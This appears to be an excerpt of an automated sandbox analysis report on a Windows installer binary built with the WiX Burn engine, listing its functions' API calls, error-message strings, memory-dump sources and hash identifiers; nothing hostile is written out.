                                                                                                                                                          Function 00422B06 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 110threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,004218F0,00000000,00000000,00000000), ref: 00422BA5
                                                                                                                                                          • GetLastError.KERNEL32(?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808), ref: 00422BB9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastThread
                                                                                                                                                          • String ID: Failed to actually elevate.$Failed to cache engine to working directory.$Failed to create unelevated logging thread.$Failed to overwrite the %ls built-in variable.$WixBundleElevated$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 1689873465-3977662230
                                                                                                                                                          • Opcode ID: ba0f55adec7f7428856748aafaaa67f764eec3fd7cc2ad0687dc8c838c5475d2
                                                                                                                                                          • Instruction ID: 044dbed656b3953a4281a815340ba4bc768e7f60ddea2d91f8790084e1f0b364
                                                                                                                                                          • Opcode Fuzzy Hash: ba0f55adec7f7428856748aafaaa67f764eec3fd7cc2ad0687dc8c838c5475d2
                                                                                                                                                          • Instruction Fuzzy Hash: 8E314D71B40B357AD22159655D45FEBAB4CEB00B60F914527FE04BA1C0E2ECAC1046ED
                                                                                                                                                          Function 004719DA Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00444519,00000000,?), ref: 004719F1
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00444519,00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?), ref: 004719FF
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00444519,00000000,?), ref: 00471A56
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00444519,00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?), ref: 00471A60
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConfigErrorHeapLastQueryService$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
                                                                                                                                                          • API String ID: 36289606-3257316652
                                                                                                                                                          • Opcode ID: f3fa8884b7319be9f134be2d04cdb717bdc13d48aeab876b195a48365110e307
                                                                                                                                                          • Instruction ID: d87bd3134630c9bba0fe5edd156c284877a79449588fb820b046707a0d566e64
                                                                                                                                                          • Opcode Fuzzy Hash: f3fa8884b7319be9f134be2d04cdb717bdc13d48aeab876b195a48365110e307
                                                                                                                                                          • Instruction Fuzzy Hash: B931CC32B4232077E73155994C46FEB6A1CDB15B64F114067FE08BA2A1E6BC8D0192F9
                                                                                                                                                          Function 0041217C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 104COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?,00000000,00000000,000004A0,000004A0,00000120,00000000,000004A0,00000000,00000120,00000000), ref: 004121F6
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00412201
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 004121B7, 00412241
                                                                                                                                                          • Failed to initialize file search., xrefs: 004121A5
                                                                                                                                                          • Failed to set variable to file search path., xrefs: 0041226A
                                                                                                                                                          • Failed to format variable string., xrefs: 004121DF
                                                                                                                                                          • Failed while searching file search: %ls, for path: %ls, xrefs: 0041222F
                                                                                                                                                          • File search: %ls, did not find path: %ls, xrefs: 00412286
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                          • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 1799206407-1422290061
                                                                                                                                                          • Opcode ID: 4453e6543616dc35184907751ccb1b212d4a946249ba1da5a58bafe3b486f745
                                                                                                                                                          • Instruction ID: 4fed2eef2a8eb312ff64e8f2e39c6e8c884792da9ddfa560171719f9a71cbf2b
                                                                                                                                                          • Opcode Fuzzy Hash: 4453e6543616dc35184907751ccb1b212d4a946249ba1da5a58bafe3b486f745
                                                                                                                                                          • Instruction Fuzzy Hash: DF316F32D80235B7DB225A958E06FDF7A28AF04714F6042A7F904FA1D1D3F89DA056DD
                                                                                                                                                          Function 004510A2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 004510BB
                                                                                                                                                          • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004510D3
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045111E
                                                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00451135
                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0045113E
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\netfxchainer.cpp, xrefs: 004511A1
                                                                                                                                                          • Failed to send files in use message from netfx chainer., xrefs: 0045118F
                                                                                                                                                          • Failed to get message from netfx chainer., xrefs: 0045115F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                          • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp
                                                                                                                                                          • API String ID: 2608678126-3719129989
                                                                                                                                                          • Opcode ID: 10d8130c2cfddf9985f9bed77e55deaf361af9ad1020b6625011d3e0127ed879
                                                                                                                                                          • Instruction ID: 9ea8f2d9d3ea104a9ad396523aa26f68fcd2348b6ceacc0f2ff1db9a9482967c
                                                                                                                                                          • Opcode Fuzzy Hash: 10d8130c2cfddf9985f9bed77e55deaf361af9ad1020b6625011d3e0127ed879
                                                                                                                                                          • Instruction Fuzzy Hash: BD31FE31A00219BFCB118F54CC49FEEBFB8EF18721F108266F914A62A2D77499508B94
                                                                                                                                                          Function 00405710 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000001,00000000,00000003,00000080,00000000), ref: 0040575D
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040576A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040577C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateFile
                                                                                                                                                          • String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1722934493-3865078597
                                                                                                                                                          • Opcode ID: 622ea4ef686c02b8ca976785e42b40cbd9841b2c5e01a85972f339dfb955b3fb
                                                                                                                                                          • Instruction ID: ebb0c7778c90887b3176de47571f7409eed532a978c29bfbe94b7fac6c73ff24
                                                                                                                                                          • Opcode Fuzzy Hash: 622ea4ef686c02b8ca976785e42b40cbd9841b2c5e01a85972f339dfb955b3fb
                                                                                                                                                          • Instruction Fuzzy Hash: 3E21B373AC162073E23131195C8AFAB6A1CDB55B70F51813BFE08BB2C1AA6C4C4169F9
                                                                                                                                                          Function 0046E8CB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87sleepfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?), ref: 0046E932
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0046E93F
                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0046E963
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 0046E9AD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                          • String ID: Failed to allocate name of pipe.$Failed to open parent pipe: %ls$\\.\pipe\%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 1275171361-2109688770
                                                                                                                                                          • Opcode ID: 3fd1cbe2b29dbff84cf37143f7cc6bafe409115f7ce3ea3e12abcb997311b0f6
                                                                                                                                                          • Instruction ID: 2a6be56b174cb2ebd5d7e82ac9ef375af8edfb6be0580772a8689a9f266824b4
                                                                                                                                                          • Opcode Fuzzy Hash: 3fd1cbe2b29dbff84cf37143f7cc6bafe409115f7ce3ea3e12abcb997311b0f6
                                                                                                                                                          • Instruction Fuzzy Hash: 0E213D76A84320B3E63016668C46F5B3A949F01B30F610323FE247B2D2E2BD4D1881DE
                                                                                                                                                          Function 0045505A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00455179
                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00455287
                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 004553D9
                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 004553F4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 2751267872-393685449
                                                                                                                                                          • Opcode ID: b473642c48b83dba07ccec72ab840ff0fc6bb47d5f16b8bae2ae65ced898e995
                                                                                                                                                          • Instruction ID: 6db1a3062a10a0d3e2a6b22319a0c1ddcf664cb6676f75d875355d60f9e6ebd9
                                                                                                                                                          • Opcode Fuzzy Hash: b473642c48b83dba07ccec72ab840ff0fc6bb47d5f16b8bae2ae65ced898e995
                                                                                                                                                          • Instruction Fuzzy Hash: 54B17871800A09DFCF15DF95C8A1AAEBBB4BF44316F14455BEC046B203D378DA59CB99
                                                                                                                                                          Function 0043BA10 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0043BA59
                                                                                                                                                          Strings
                                                                                                                                                          • BundleVersion, xrefs: 0043BA83
                                                                                                                                                          • Failed to parse related bundle package version: %ls, xrefs: 0043BAD1
                                                                                                                                                          • BA aborted detect related BUNDLE package., xrefs: 0043BB7F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp, xrefs: 0043BAA8, 0043BB74, 0043BB79, 0043BB91
                                                                                                                                                          • Failed to read version from registry for related bundle package: %ls, xrefs: 0043BA96
                                                                                                                                                          • Failed to compare related bundle package version: %ls, xrefs: 0043BB29
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: BA aborted detect related BUNDLE package.$BundleVersion$Failed to compare related bundle package version: %ls$Failed to parse related bundle package version: %ls$Failed to read version from registry for related bundle package: %ls$d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                          • API String ID: 1825529933-652315071
                                                                                                                                                          • Opcode ID: 4181a200b99ae3ad4f0d60cf8d619f5ca72aa13c808051606dd97df338e5c2ca
                                                                                                                                                          • Instruction ID: 715c1f5c85d4b96b82c1c485a4761f447da3ec697ab80021bf621c9e8cddc9d5
                                                                                                                                                          • Opcode Fuzzy Hash: 4181a200b99ae3ad4f0d60cf8d619f5ca72aa13c808051606dd97df338e5c2ca
                                                                                                                                                          • Instruction Fuzzy Hash: 8B518131A40204BFDF11DF95CC46FAEBBB5EF08310F2040A6F615BA191E779AA40DB59
                                                                                                                                                          Function 004298E2 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00424D70,00000000,00000000,00000000), ref: 0042997A
                                                                                                                                                          • GetLastError.KERNEL32(?,00408A99,?,?,?,?,?,?,?,?,?,?,00000000,?,crypt32.dll,?), ref: 00429986
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000493E0,?,?,00428840,?,?,?,00408A99,?,?,?,?,?,?), ref: 00429A54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorHandleLastThread
                                                                                                                                                          • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$Failed to wait for cache thread to complete.$d:\a\wix\wix\src\burn\engine\elevation.cpp
                                                                                                                                                          • API String ID: 747004058-3124151470
                                                                                                                                                          • Opcode ID: 982609cd679571d97ffd1623434dfa53404fadeeb480cc752d987bc672011d1e
                                                                                                                                                          • Instruction ID: cf34df0919f1a8c4bbccaff1758d65dae9fba80d0251798cab6568c2adc7994b
                                                                                                                                                          • Opcode Fuzzy Hash: 982609cd679571d97ffd1623434dfa53404fadeeb480cc752d987bc672011d1e
                                                                                                                                                          • Instruction Fuzzy Hash: 0C51E8B1E01218AFDB11DF99D981A9EBBF8AB48754F50406AF908F7340E774AD418B94
                                                                                                                                                          Function 0046F8B9 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 135registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000214,00000120,00000120,00020019,00000214,000004A0,00000120,000001F8,00000120,00000120,?,?,?,0041FCE3,?,?), ref: 0046FA0A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open the registry key for the dependency "%ls"., xrefs: 0046F926
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F9F5
                                                                                                                                                          • Failed to get the version for the dependency "%ls"., xrefs: 0046F9E9
                                                                                                                                                          • Failed to get the name for the dependency "%ls"., xrefs: 0046F9AC
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F8DD
                                                                                                                                                          • Failed to get the id for the dependency "%ls"., xrefs: 0046F96F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Closelstrlen
                                                                                                                                                          • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 3903209405-3351240443
                                                                                                                                                          • Opcode ID: 33bf01e0fbad6606c0f9ddebe7803b8cabf83f35d1453fc03a96f09a949e5e7d
                                                                                                                                                          • Instruction ID: cf09e503aa3a59c473a5b0bcf4439e08c51d6ade0bcde117d5ac0208abc2035c
                                                                                                                                                          • Opcode Fuzzy Hash: 33bf01e0fbad6606c0f9ddebe7803b8cabf83f35d1453fc03a96f09a949e5e7d
                                                                                                                                                          • Instruction Fuzzy Hash: 83415772A40366F7DF315E84AC46FAF6A249B00720F15013BB9807B290F27C4D48D68B
                                                                                                                                                          Function 0041F5F8 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to check the dictionary of unique dependencies., xrefs: 0041F66C
                                                                                                                                                          • Failed to add "%ls" to the string dictionary., xrefs: 0041F6F5
                                                                                                                                                          • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0041F709
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041F631, 0041F67E, 0041F71B
                                                                                                                                                          • Failed to create the string dictionary., xrefs: 0041F61F
                                                                                                                                                          • ALL, xrefs: 0041F6BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 0-3135785055
                                                                                                                                                          • Opcode ID: 1965e6d05cb54a11c1fec7dbec4ece212789e90ce512297bfb8e8416afa2e0a6
                                                                                                                                                          • Instruction ID: 06b2d7f25587c86374013b8faece8725ef1489168a460c6e32ad1185bc9253c6
                                                                                                                                                          • Opcode Fuzzy Hash: 1965e6d05cb54a11c1fec7dbec4ece212789e90ce512297bfb8e8416afa2e0a6
                                                                                                                                                          • Instruction Fuzzy Hash: 2E310971A8032477E72166558C07FDF3AA49B81F64F200177FA04BA1D1F6B85D8687AD
                                                                                                                                                          Function 00404CA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
